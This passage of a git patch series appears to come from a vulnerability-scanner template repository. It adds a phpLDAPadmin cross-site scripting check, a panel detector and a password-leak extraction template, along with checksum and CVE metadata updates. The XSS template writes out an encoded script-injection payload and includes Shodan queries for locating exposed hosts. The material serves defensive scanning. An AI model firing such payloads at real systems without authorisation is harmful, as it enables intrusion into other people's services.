http/miscellaneous/gpc-json.yaml:994f54409ea33bd6173cafd61e47f5c7bd0a807b @@ -7060,7 +7060,7 @@ ssl/ssl-dns-names.yaml:129f54a4e678dde99ca1879ca39a34cd892394ed ssl/tls-version.yaml:cde833d5e6578a1c2e2a6a21e4f38da30d6cf750 ssl/untrusted-root-certificate.yaml:207afac20c036cab562f9b10d469cf709cf977f0 ssl/weak-cipher-suites.yaml:e7d7e428b783106eb31b3e06736dad670d5c669e -templates-checksum.txt:fceaf08613125d02c886eaa3b6900595ea814088 +templates-checksum.txt:ddee390df1ab1c22a998d377d1c06b7141ed5394 wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1 workflows/74cms-workflow.yaml:a6732eab4577f5dcf07eab6cf5f9c683fea75b7c workflows/acrolinx-workflow.yaml:ae86220e8743583a24dc5d81c8a83fa01deb157f From e0f621972453b5019c2c63c4e6e4527ddf45450f Mon Sep 17 00:00:00 2001 From: herry <68461463+herry2525@users.noreply.github.com> Date: Tue, 12 Sep 2023 13:01:20 +0530 Subject: [PATCH 0307/1090] Create phpldapadmin-xss --- custom-phpldapadmin-xss | 16 ++++++++++++++++ 1 file changed, 16 insertions(+) create mode 100644 custom-phpldapadmin-xss diff --git a/custom-phpldapadmin-xss b/custom-phpldapadmin-xss new file mode 100644 index 0000000000..44908e3582 --- /dev/null +++ b/custom-phpldapadmin-xss @@ -0,0 +1,16 @@ +id: custom-phpldapadmin-xss +info: + name: Custom PHP LDAP Admin XSS Detection + author: GodfatherOrwa, herry + Reference : https://twitter.com/GodfatherOrwa/status/1701392754251563477 + severity: medium + +http: + - method: GET + path: + - "{{BaseURL}}/phpldapadmin/cmd.php?cmd=template_engine&dn=%27%22()%26%25%3Czzz%3E%3CScRiPt%20%3Ealert(%27Orwa%27)%3C/ScRiPt%3E&meth=ajax&server_id=1" + matchers: + - type: word + words: + - "" + part: body From 9c29ff3819e44bd45142e2a694f876dcbb4a16bc Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Tue, 12 Sep 2023 14:54:31 +0530 Subject: [PATCH 0308/1090] complete template update --- custom-phpldapadmin-xss | 16 ------- .../other/phpldapadmin-xss.yaml | 47 +++++++++++++++++++ 2 files changed, 47 insertions(+), 16 deletions(-) delete mode 100644 custom-phpldapadmin-xss create mode 100644 http/vulnerabilities/other/phpldapadmin-xss.yaml diff --git a/custom-phpldapadmin-xss b/custom-phpldapadmin-xss deleted file mode 100644 index 44908e3582..0000000000 --- a/custom-phpldapadmin-xss +++ /dev/null @@ -1,16 +0,0 @@ -id: custom-phpldapadmin-xss -info: - name: Custom PHP LDAP Admin XSS Detection - author: GodfatherOrwa, herry - Reference : https://twitter.com/GodfatherOrwa/status/1701392754251563477 - severity: medium - -http: - - method: GET - path: - - "{{BaseURL}}/phpldapadmin/cmd.php?cmd=template_engine&dn=%27%22()%26%25%3Czzz%3E%3CScRiPt%20%3Ealert(%27Orwa%27)%3C/ScRiPt%3E&meth=ajax&server_id=1" - matchers: - - type: word - words: - - "" - part: body diff --git a/http/vulnerabilities/other/phpldapadmin-xss.yaml b/http/vulnerabilities/other/phpldapadmin-xss.yaml new file mode 100644 index 0000000000..2577f1202d --- /dev/null +++ b/http/vulnerabilities/other/phpldapadmin-xss.yaml @@ -0,0 +1,47 @@ +id: phpldapadmin-xss + +info: + name: PHP LDAP Admin < 1.2.5 - Cross-Site Scripting + author: GodfatherOrwa,herry + severity: medium + reference: + - https://twitter.com/GodfatherOrwa/status/1701392754251563477 + metadata: + max-request: 3 + verified: true + shodan-query: html:"phpLDAPadmin" + tags: php,phpldapadmin,xss + +http: + - method: GET + path: + - "{{BaseURL}}" + - "{{BaseURL}}{{path}}/cmd.php?cmd=template_engine&dn=%27%22()%26%25%3Czzz%3E%3Cscript%3Ealert(document.domain)%3C/script%3E&meth=ajax&server_id=1" + - "{{BaseURL}}{{path}}/index.php?redirect=true&meth=ajax" + + attack: pitchfork + payloads: + path: + - + - /htdocs/index.php + - /phpldapadmin + + stop-at-first-match: true + cookie-reuse: true + matchers-condition: and + matchers: + - type: word + part: body + words: + - "" + - "No such entry" + condition: and + + - type: word + part: header + words: + - text/html + + - type: status + status: + - 200 From 133a4c5dd1d42cd926f069336aab419eec0e1487 Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Tue, 12 Sep 2023 14:58:16 +0530 Subject: [PATCH 0309/1090] lint fix --- http/vulnerabilities/other/phpldapadmin-xss.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/http/vulnerabilities/other/phpldapadmin-xss.yaml b/http/vulnerabilities/other/phpldapadmin-xss.yaml index 2577f1202d..b8ac642629 100644 --- a/http/vulnerabilities/other/phpldapadmin-xss.yaml +++ b/http/vulnerabilities/other/phpldapadmin-xss.yaml @@ -22,7 +22,7 @@ http: attack: pitchfork payloads: path: - - + - / - /htdocs/index.php - /phpldapadmin From f174d458515cd940a20d22dac9c73e7be39894f2 Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Tue, 12 Sep 2023 15:00:08 +0530 Subject: [PATCH 0310/1090] Create phpldapadmin-panel.yaml --- http/exposed-panels/phpldapadmin-panel.yaml | 38 +++++++++++++++++++++ 1 file changed, 38 insertions(+) create mode 100644 http/exposed-panels/phpldapadmin-panel.yaml diff --git a/http/exposed-panels/phpldapadmin-panel.yaml b/http/exposed-panels/phpldapadmin-panel.yaml new file mode 100644 index 0000000000..5d1d82cbd5 --- /dev/null +++ b/http/exposed-panels/phpldapadmin-panel.yaml @@ -0,0 +1,38 @@ +id: phpldapadmin-panel + +info: + name: PHP LDAP Admin Panel - Detect + author: ritikchaddha + severity: info + metadata: + max-request: 1 + verified: true + shodan-query: title:"phpLDAPadmin" + tags: php,phpldapadmin,panel,detect + +http: + - method: GET + path: + - '{{BaseURL}}' + - '{{BaseURL}}/phpldapadmin' + - '{{BaseURL}}/htdocs/index.php' + + stop-at-first-match: true + host-redirects: true + max-redirects: 2 + matchers-condition: and + matchers: + - type: word + part: body + words: + - "phpLDAPadmin (" + - "/projects/phpldapadmin" + - "alt=\"phpLDAPadmin logo" + condition: or + + extractors: + - type: regex + part: body + group: 1 + regex: + - '
([0-9.]+)<\/div>' From a6de73b2af344be077b5792a168b4941a45051a2 Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Tue, 12 Sep 2023 15:12:52 +0530 Subject: [PATCH 0311/1090] Rename aic-intelligent-campus-system-password-leak.yaml to aic-intelligent-password-leak.yaml --- ...em-password-leak.yaml => aic-intelligent-password-leak.yaml} | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) rename http/vulnerabilities/other/{aic-intelligent-campus-system-password-leak.yaml => aic-intelligent-password-leak.yaml} (96%) diff --git a/http/vulnerabilities/other/aic-intelligent-campus-system-password-leak.yaml b/http/vulnerabilities/other/aic-intelligent-password-leak.yaml similarity index 96% rename from http/vulnerabilities/other/aic-intelligent-campus-system-password-leak.yaml rename to http/vulnerabilities/other/aic-intelligent-password-leak.yaml index 9b58c3399c..ac92e017d7 100755 --- a/http/vulnerabilities/other/aic-intelligent-campus-system-password-leak.yaml +++ b/http/vulnerabilities/other/aic-intelligent-password-leak.yaml @@ -35,4 +35,4 @@ http: part: body group: 1 regex: - - "\"密码\":\"(.*?)\"" \ No newline at end of file + - "\"密码\":\"(.*?)\"" From 3191165c54897720463dd69c2b2a5da506e66d86 Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Tue, 12 Sep 2023 15:19:57 +0530 Subject: [PATCH 0312/1090] Delete http/exposed-panels/phpldap-admin.yaml --- http/exposed-panels/phpldap-admin.yaml | 34 -------------------------- 1 file changed, 34 deletions(-) delete mode 100644 http/exposed-panels/phpldap-admin.yaml diff --git a/http/exposed-panels/phpldap-admin.yaml b/http/exposed-panels/phpldap-admin.yaml deleted file mode 100644 index f4dc0097e2..0000000000 --- a/http/exposed-panels/phpldap-admin.yaml +++ /dev/null @@ -1,34 +0,0 @@ -id: phpldap-admin - -info: - name: phpLDAPadmin Login Panel - Detect - author: DhiyaneshDk - severity: info - description: phpLDAPadmin login panel was detected. - reference: - - https://www.facebook.com/ExWareLabs/photos/a.361854183878462/5601756213221540/ - classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 - cwe-id: CWE-200 - metadata: - max-request: 1 - verified: true - shodan-query: title:"phpLDAPAdmin" - tags: panel,php,phpldap - -http: - - method: GET - path: - - '{{BaseURL}}' - - matchers-condition: and - matchers: - - type: word - part: body - words: - - 'phpLDAPadmin' - - - type: status - status: - - 200 From ea7118bfeecfd625e785689d00fe4df6593e159e Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Tue, 12 Sep 2023 15:20:23 +0530 Subject: [PATCH 0313/1090] Update phpldapadmin-panel.yaml --- http/exposed-panels/phpldapadmin-panel.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/http/exposed-panels/phpldapadmin-panel.yaml b/http/exposed-panels/phpldapadmin-panel.yaml index 5d1d82cbd5..8013abf80a 100644 --- a/http/exposed-panels/phpldapadmin-panel.yaml +++ b/http/exposed-panels/phpldapadmin-panel.yaml @@ -2,7 +2,7 @@ id: phpldapadmin-panel info: name: PHP LDAP Admin Panel - Detect - author: ritikchaddha + author: ritikchaddha,DhiyaneshDk severity: info metadata: max-request: 1 From eccb1436db298ea8b104e423124a31827bb29ed8 Mon Sep 17 00:00:00 2001 From: GitHub Action <action@github.com> Date: Tue, 12 Sep 2023 09:54:45 +0000 Subject: [PATCH 0314/1090] Auto Generated New Template Addition List [Tue Sep 12 09:54:45 UTC 2023] :robot: --- .new-additions | 1 + 1 file changed, 1 insertion(+) diff --git a/.new-additions b/.new-additions index eabdd1ba0b..6284613728 100644 --- a/.new-additions +++ b/.new-additions @@ -1,2 +1,3 @@ +http/exposed-panels/phpldapadmin-panel.yaml http/exposed-panels/symantec/symantec-phishing-panel.yaml http/misconfiguration/gitlab/gitlab-public-registration.yaml From 9d0d022d1935a5ab57344b3bffafd2c54fd7c39c Mon Sep 17 00:00:00 2001 From: GitHub Action <action@github.com> Date: Tue, 12 Sep 2023 09:55:02 +0000 Subject: [PATCH 0315/1090] Auto Generated Templates Checksum [Tue Sep 12 09:55:02 UTC 2023] :robot: --- templates-checksum.txt | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/templates-checksum.txt b/templates-checksum.txt index 1ae5042aa5..610aaeebbd 100644 --- a/templates-checksum.txt +++ b/templates-checksum.txt @@ -3402,7 +3402,7 @@ http/exposed-panels/phabricator-login.yaml:2fd5d40e5b773c20fb89c96769c3b53b132df http/exposed-panels/phoronix-pane.yaml:7b9bb1921638cf549ecf09d9825ccbacebf21b04 http/exposed-panels/php-mailer.yaml:55469afbd628d08619169906f8cff2d7a51f6e15 http/exposed-panels/phpcollab-panel.yaml:8d684722c2948ef09a58eb50d4e5e0bc9c701be4 -http/exposed-panels/phpldap-admin.yaml:0935e5687847b3ba562f9a42f455cb9a2d798f31 +http/exposed-panels/phpldapadmin-panel.yaml:747f1ba8e33fe5e116ea41382a5c1be51d4c14c1 http/exposed-panels/phpminiadmin-panel.yaml:b63f7d12cef87b7e77b949a9c8ceb79bc28ff152 http/exposed-panels/phpmyadmin-panel.yaml:8b0e93be656c378dbc9fb0d776abdae687f4f9cc http/exposed-panels/phppgadmin-panel.yaml:de2f1f2cf53bb3864301abee261f0710223bdc7e @@ -7060,7 +7060,7 @@ ssl/ssl-dns-names.yaml:129f54a4e678dde99ca1879ca39a34cd892394ed ssl/tls-version.yaml:cde833d5e6578a1c2e2a6a21e4f38da30d6cf750 ssl/untrusted-root-certificate.yaml:207afac20c036cab562f9b10d469cf709cf977f0 ssl/weak-cipher-suites.yaml:e7d7e428b783106eb31b3e06736dad670d5c669e -templates-checksum.txt:ddee390df1ab1c22a998d377d1c06b7141ed5394 +templates-checksum.txt:2f1354b8a9fa6f9200f2bfec62604530ed0684dc wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1 workflows/74cms-workflow.yaml:a6732eab4577f5dcf07eab6cf5f9c683fea75b7c workflows/acrolinx-workflow.yaml:ae86220e8743583a24dc5d81c8a83fa01deb157f From 2901250b315c1175692be73dbfa2fcf06b01986a Mon Sep 17 00:00:00 2001 From: GitHub Action <action@github.com> Date: Tue, 12 Sep 2023 09:56:07 +0000 Subject: [PATCH 0316/1090] Auto Generated New Template Addition List [Tue Sep 12 09:56:07 UTC 2023] :robot: --- .new-additions | 1 + 1 file changed, 1 insertion(+) diff --git a/.new-additions b/.new-additions index 6284613728..0ba026f0ad 100644 --- a/.new-additions +++ b/.new-additions @@ -1,3 +1,4 @@ http/exposed-panels/phpldapadmin-panel.yaml http/exposed-panels/symantec/symantec-phishing-panel.yaml http/misconfiguration/gitlab/gitlab-public-registration.yaml +http/vulnerabilities/other/phpldapadmin-xss.yaml From 2c44da575b6031f15a9f53bc533db7c27adf08c1 Mon Sep 17 00:00:00 2001 From: GitHub Action <action@github.com> Date: Tue, 12 Sep 2023 09:56:16 +0000 Subject: [PATCH 0317/1090] Auto Generated Templates Checksum [Tue Sep 12 09:56:16 UTC 2023] :robot: --- templates-checksum.txt | 3 ++- 1 file changed, 2 insertions(+), 1 deletion(-) diff --git a/templates-checksum.txt b/templates-checksum.txt index 610aaeebbd..74dc60652d 100644 --- a/templates-checksum.txt +++ b/templates-checksum.txt @@ -6591,6 +6591,7 @@ http/vulnerabilities/other/pbootcms-database-file-download.yaml:d1d7fe09c6186319 http/vulnerabilities/other/pdf-signer-ssti-to-rce.yaml:87da5310b3a936c88a2fb5013ce783c728627f8b http/vulnerabilities/other/php-timeclock-xss.yaml:4eb8391a98dd8b8c3c01c205d9de0a42606badac http/vulnerabilities/other/php-zerodium-backdoor-rce.yaml:2aa0c44d951a0588404b2bf85a44a459a9a84b2b +http/vulnerabilities/other/phpldapadmin-xss.yaml:a3d4ebd4a7b62c0ec59f6d084ddf11fe73de2ae7 http/vulnerabilities/other/phpok-sqli.yaml:fcc618cbd03b381f0380eb7f73c738a4fb55d1be http/vulnerabilities/other/phpwiki-lfi.yaml:88f9fe0e453c6d93bd9226d0d8ae866d36c93148 http/vulnerabilities/other/pmb-directory-traversal.yaml:fdbe099c6bad045dbfa40e0cdc871e63721c08bb @@ -7060,7 +7061,7 @@ ssl/ssl-dns-names.yaml:129f54a4e678dde99ca1879ca39a34cd892394ed ssl/tls-version.yaml:cde833d5e6578a1c2e2a6a21e4f38da30d6cf750 ssl/untrusted-root-certificate.yaml:207afac20c036cab562f9b10d469cf709cf977f0 ssl/weak-cipher-suites.yaml:e7d7e428b783106eb31b3e06736dad670d5c669e -templates-checksum.txt:2f1354b8a9fa6f9200f2bfec62604530ed0684dc +templates-checksum.txt:6cbe05ba05c30e719757ad21373ca45b358aafb3 wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1 workflows/74cms-workflow.yaml:a6732eab4577f5dcf07eab6cf5f9c683fea75b7c workflows/acrolinx-workflow.yaml:ae86220e8743583a24dc5d81c8a83fa01deb157f From d8b16d4d10d8593d81269fdf5d487229cc1898d9 Mon Sep 17 00:00:00 2001 From: GitHub Action <action@github.com> Date: Tue, 12 Sep 2023 09:56:24 +0000 Subject: [PATCH 0318/1090] TemplateMan Update [Tue Sep 12 09:56:24 UTC 2023] :robot: --- http/exposed-panels/phpldapadmin-panel.yaml | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/http/exposed-panels/phpldapadmin-panel.yaml b/http/exposed-panels/phpldapadmin-panel.yaml index 8013abf80a..da469e8ea4 100644 --- a/http/exposed-panels/phpldapadmin-panel.yaml +++ b/http/exposed-panels/phpldapadmin-panel.yaml @@ -5,9 +5,9 @@ info: author: ritikchaddha,DhiyaneshDk severity: info metadata: - max-request: 1 - verified: true + max-request: 3 shodan-query: title:"phpLDAPadmin" + verified: true tags: php,phpldapadmin,panel,detect http: From 27c7d6ea0b8cbe87a4c987ad0db595817a431239 Mon Sep 17 00:00:00 2001 From: GitHub Action <action@github.com> Date: Tue, 12 Sep 2023 09:57:47 +0000 Subject: [PATCH 0319/1090] TemplateMan Update [Tue Sep 12 09:57:47 UTC 2023] :robot: --- http/vulnerabilities/other/phpldapadmin-xss.yaml | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/http/vulnerabilities/other/phpldapadmin-xss.yaml b/http/vulnerabilities/other/phpldapadmin-xss.yaml index b8ac642629..35f3a1a53d 100644 --- a/http/vulnerabilities/other/phpldapadmin-xss.yaml +++ b/http/vulnerabilities/other/phpldapadmin-xss.yaml @@ -7,9 +7,9 @@ info: reference: - https://twitter.com/GodfatherOrwa/status/1701392754251563477 metadata: - max-request: 3 - verified: true + max-request: 9 shodan-query: html:"phpLDAPadmin" + verified: true tags: php,phpldapadmin,xss http: From 5f960e791ee57f9d728584e28079e0196fe9363f Mon Sep 17 00:00:00 2001 From: GitHub Action <action@github.com> Date: Tue, 12 Sep 2023 10:02:59 +0000 Subject: [PATCH 0320/1090] Auto Generated New Template Addition List [Tue Sep 12 10:02:58 UTC 2023] :robot: --- .new-additions | 1 + 1 file changed, 1 insertion(+) diff --git a/.new-additions b/.new-additions index 0ba026f0ad..7c6bf6e38a 100644 --- a/.new-additions +++ b/.new-additions @@ -1,3 +1,4 @@ +http/cves/2023/CVE-2023-30943.yaml http/exposed-panels/phpldapadmin-panel.yaml http/exposed-panels/symantec/symantec-phishing-panel.yaml http/misconfiguration/gitlab/gitlab-public-registration.yaml From e964c0a967685ad64b872cd721bdee79b3e1569c Mon Sep 17 00:00:00 2001 From: GitHub Action <action@github.com> Date: Tue, 12 Sep 2023 10:03:09 +0000 Subject: [PATCH 0321/1090] Auto Generated Templates Checksum [Tue Sep 12 10:03:09 UTC 2023] :robot: --- templates-checksum.txt | 7 ++++--- 1 file changed, 4 insertions(+), 3 deletions(-) diff --git a/templates-checksum.txt b/templates-checksum.txt index 74dc60652d..31eb3e01c9 100644 --- a/templates-checksum.txt +++ b/templates-checksum.txt @@ -2583,6 +2583,7 @@ http/cves/2023/CVE-2023-30210.yaml:71ae3d7ad314976aeb71b729180811c8651167f3 http/cves/2023/CVE-2023-30212.yaml:7bbba5d69097264c92082a2d1c0137a7112afb4f http/cves/2023/CVE-2023-30256.yaml:fba23a427b13b465c1344cd715b20ace2bab0c04 http/cves/2023/CVE-2023-30777.yaml:a85266e648712c90b7a61c36203e54bd870a1294 +http/cves/2023/CVE-2023-30943.yaml:53ac50460d580e0b330c544482270c1c4338ab44 http/cves/2023/CVE-2023-31059.yaml:79beddc21d9c94f13d891bed078ef8ba86c2e742 http/cves/2023/CVE-2023-31548.yaml:cc09e62b3690267dd292538836d508334541ae41 http/cves/2023/CVE-2023-32117.yaml:be5730b349c6bc4b04a813fa448394ef7afe48f5 @@ -3402,7 +3403,7 @@ http/exposed-panels/phabricator-login.yaml:2fd5d40e5b773c20fb89c96769c3b53b132df http/exposed-panels/phoronix-pane.yaml:7b9bb1921638cf549ecf09d9825ccbacebf21b04 http/exposed-panels/php-mailer.yaml:55469afbd628d08619169906f8cff2d7a51f6e15 http/exposed-panels/phpcollab-panel.yaml:8d684722c2948ef09a58eb50d4e5e0bc9c701be4 -http/exposed-panels/phpldapadmin-panel.yaml:747f1ba8e33fe5e116ea41382a5c1be51d4c14c1 +http/exposed-panels/phpldapadmin-panel.yaml:21bd458fd22a5333ffd2ba5a8553cab9a8b84c16 http/exposed-panels/phpminiadmin-panel.yaml:b63f7d12cef87b7e77b949a9c8ceb79bc28ff152 http/exposed-panels/phpmyadmin-panel.yaml:8b0e93be656c378dbc9fb0d776abdae687f4f9cc http/exposed-panels/phppgadmin-panel.yaml:de2f1f2cf53bb3864301abee261f0710223bdc7e @@ -6591,7 +6592,7 @@ http/vulnerabilities/other/pbootcms-database-file-download.yaml:d1d7fe09c6186319 http/vulnerabilities/other/pdf-signer-ssti-to-rce.yaml:87da5310b3a936c88a2fb5013ce783c728627f8b http/vulnerabilities/other/php-timeclock-xss.yaml:4eb8391a98dd8b8c3c01c205d9de0a42606badac http/vulnerabilities/other/php-zerodium-backdoor-rce.yaml:2aa0c44d951a0588404b2bf85a44a459a9a84b2b -http/vulnerabilities/other/phpldapadmin-xss.yaml:a3d4ebd4a7b62c0ec59f6d084ddf11fe73de2ae7 +http/vulnerabilities/other/phpldapadmin-xss.yaml:430bf642c91cdbec2b279f46b0a6c037c166abe4 http/vulnerabilities/other/phpok-sqli.yaml:fcc618cbd03b381f0380eb7f73c738a4fb55d1be http/vulnerabilities/other/phpwiki-lfi.yaml:88f9fe0e453c6d93bd9226d0d8ae866d36c93148 http/vulnerabilities/other/pmb-directory-traversal.yaml:fdbe099c6bad045dbfa40e0cdc871e63721c08bb @@ -7061,7 +7062,7 @@ ssl/ssl-dns-names.yaml:129f54a4e678dde99ca1879ca39a34cd892394ed ssl/tls-version.yaml:cde833d5e6578a1c2e2a6a21e4f38da30d6cf750 ssl/untrusted-root-certificate.yaml:207afac20c036cab562f9b10d469cf709cf977f0 ssl/weak-cipher-suites.yaml:e7d7e428b783106eb31b3e06736dad670d5c669e -templates-checksum.txt:6cbe05ba05c30e719757ad21373ca45b358aafb3 +templates-checksum.txt:d8ef453b6f2b8c37125483012007e02b105a0b4f wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1 workflows/74cms-workflow.yaml:a6732eab4577f5dcf07eab6cf5f9c683fea75b7c workflows/acrolinx-workflow.yaml:ae86220e8743583a24dc5d81c8a83fa01deb157f From 78e1d30ab4b4c0314ba02f61e62fa7cd76d4bf35 Mon Sep 17 00:00:00 2001 From: GitHub Action <action@github.com> Date: Tue, 12 Sep 2023 10:04:40 +0000 Subject: [PATCH 0322/1090] TemplateMan Update [Tue Sep 12 10:04:40 UTC 2023] :robot: --- http/cves/2023/CVE-2023-30943.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/http/cves/2023/CVE-2023-30943.yaml b/http/cves/2023/CVE-2023-30943.yaml index c88fddc75e..4861eadc9a 100644 --- a/http/cves/2023/CVE-2023-30943.yaml +++ b/http/cves/2023/CVE-2023-30943.yaml @@ -15,7 +15,7 @@ info: cve-id: CVE-2023-30943 cwe-id: CWE-73 metadata: - max-request: 2 + max-request: 4 shodan-query: title:"Moodle" tags: cve,cve2023,moodle,xss,rce,authenticated From b9b992446b3c31a2125e0b19fa58e7cb96483106 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran <leedhiyanesh@gmail.com> Date: Tue, 12 Sep 2023 15:41:24 +0530 Subject: [PATCH 0323/1090] Update CVE-2022-23854.yaml --- http/cves/2022/CVE-2022-23854.yaml | 2 ++ 1 file changed, 2 insertions(+) diff --git a/http/cves/2022/CVE-2022-23854.yaml b/http/cves/2022/CVE-2022-23854.yaml index 42e24857df..b65c68a673 100644 --- a/http/cves/2022/CVE-2022-23854.yaml +++ b/http/cves/2022/CVE-2022-23854.yaml @@ -48,6 +48,8 @@ http: part: header words: - 'text/ini' + - 'application/octet-stream' + condition: or - type: status status: From af7ffae05d3d2d0619f4cd6f29a82eea401fac16 Mon Sep 17 00:00:00 2001 From: GitHub Action <action@github.com> Date: Tue, 12 Sep 2023 10:35:06 +0000 Subject: [PATCH 0324/1090] Auto Generated cves.json [Tue Sep 12 10:35:06 UTC 2023] :robot: --- cves.json | 10 ++++++---- cves.json-checksum.txt | 2 +- 2 files changed, 7 insertions(+), 5 deletions(-) diff --git a/cves.json b/cves.json index 054cc2fdc6..6057ababf0 100644 --- a/cves.json +++ b/cves.json @@ -1857,7 +1857,7 @@ {"ID":"CVE-2023-0297","Info":{"Name":"PyLoad 0.5.0 - Pre-auth Remote Code Execution (RCE)","Severity":"critical","Description":"Code Injection in GitHub repository pyload/pyload prior to 0.5.0b3.dev31.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-0297.yaml"} {"ID":"CVE-2023-0448","Info":{"Name":"WP Helper Lite \u003c 4.3 - Cross-Site Scripting","Severity":"medium","Description":"The WP Helper Lite WordPress plugin, in versions \u003c 4.3, returns all GET parameters unsanitized in the response, resulting in a reflected cross-site scripting vulnerability.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-0448.yaml"} {"ID":"CVE-2023-0514","Info":{"Name":"Membership Database \u003c= 1.0 - Cross-Site Scripting","Severity":"medium","Description":"Membership Database before 1.0 is susceptible to cross-site scripting via the tab parameter due to insufficient input sanitization and output escaping. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-0514.yaml"} -{"ID":"CVE-2023-0527","Info":{"Name":"Online Security Guards Hiring System - Cross-Site Scripting","Severity":"medium","Description":"A vulnerability was found in PHPGurukul Online Security Guards Hiring System 1.0 and classified as problematic. Affected by this issue is some unknown functionality of the file search-request.php. The manipulation of the argument searchdata with the input \"\u003e\u003cscript\u003ealert(document.domain)\u003c/script\u003e leads to cross site scripting. The attack may be launched remotely.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-0527.yaml"} +{"ID":"CVE-2023-0527","Info":{"Name":"Online Security Guards Hiring System - Cross-Site Scripting","Severity":"medium","Description":"A vulnerability was found in PHPGurukul Online Security Guards Hiring System 1.0 and classified as problematic. Affected by this issue is some unknown functionality of the file search-request.php.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-0527.yaml"} {"ID":"CVE-2023-0552","Info":{"Name":"WordPress Pie Register \u003c3.8.2.3 - Open Redirect","Severity":"medium","Description":"WordPress Pie Register plugin before 3.8.2.3 contains an open redirect vulnerability. The plugin does not properly validate the redirection URL when logging in and login out. An attacker can redirect a user to a malicious site and possibly obtain sensitive information, modify data, and/or execute unauthorized operations.\n","Classification":{"CVSSScore":"5.4"}},"file_path":"http/cves/2023/CVE-2023-0552.yaml"} {"ID":"CVE-2023-0562","Info":{"Name":"Bank Locker Management System v1.0 - SQL Injection","Severity":"critical","Description":"A vulnerability was found in PHPGurukul Bank Locker Management System 1.0. It has been rated as critical. Affected by this issue is some unknown functionality of the file index.php of the component Login. The manipulation of the argument username leads to sql injection.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-0562.yaml"} {"ID":"CVE-2023-0563","Info":{"Name":"Bank Locker Management System - Cross-Site Scripting","Severity":"medium","Description":"A vulnerability classified as problematic has been found in PHPGurukul Bank Locker Management System 1.0. This affects an unknown part of the file add-locker-form.php of the component Assign Locker. The manipulation of the argument ahname leads to cross site scripting. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used.\n","Classification":{"CVSSScore":"4.8"}},"file_path":"http/cves/2023/CVE-2023-0563.yaml"} @@ -1899,7 +1899,7 @@ {"ID":"CVE-2023-23488","Info":{"Name":"WordPress Paid Memberships Pro \u003c2.9.8 - Blind SQL Injection","Severity":"critical","Description":"WordPress Paid Memberships Pro plugin before 2.9.8 contains a blind SQL injection vulnerability in the 'code' parameter of the /pmpro/v1/order REST route. An attacker can possibly obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-23488.yaml"} {"ID":"CVE-2023-23489","Info":{"Name":"WordPress Easy Digital Downloads 3.1.0.2/3.1.0.3 - SQL Injection","Severity":"critical","Description":"WordPress Easy Digital Downloads plugin 3.1.0.2 and 3.1.0.3 contains a SQL injection vulnerability in the s parameter of its edd_download_search action. An attacker can possibly obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-23489.yaml"} {"ID":"CVE-2023-23491","Info":{"Name":"Quick Event Manager \u003c 9.7.5 - Cross-Site Scripting","Severity":"medium","Description":"The Quick Event Manager WordPress Plugin, version \u003c 9.7.5, is affected by a reflected cross-site scripting vulnerability in the 'category' parameter of its 'qem_ajax_calendar' action.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-23491.yaml"} -{"ID":"CVE-2023-23492","Info":{"Name":"Login with Phone Number - Cross-Site Scripting","Severity":"high","Description":"Login with Phone Number, versions \u003c 1.4.2, is affected by an reflected XSS vulnerability in the login-with-phonenumber.php' file in the 'lwp_forgot_password()' function.\n\nNote that CVE-2023-23492 incorrectly describes and scores this as SQL injection vulnerability.\n","Classification":{"CVSSScore":"8.8"}},"file_path":"http/cves/2023/CVE-2023-23492.yaml"} +{"ID":"CVE-2023-23492","Info":{"Name":"Login with Phone Number - Cross-Site Scripting","Severity":"high","Description":"Login with Phone Number, versions \u003c 1.4.2, is affected by an reflected XSS vulnerability in the login-with-phonenumber.php' file in the 'lwp_forgot_password()' function.\n","Classification":{"CVSSScore":"8.8"}},"file_path":"http/cves/2023/CVE-2023-23492 2.yaml"} {"ID":"CVE-2023-2356","Info":{"Name":"Mlflow \u003c2.3.0 - Local File Inclusion","Severity":"high","Description":"Relative Path Traversal in GitHub repository mlflow/mlflow prior to 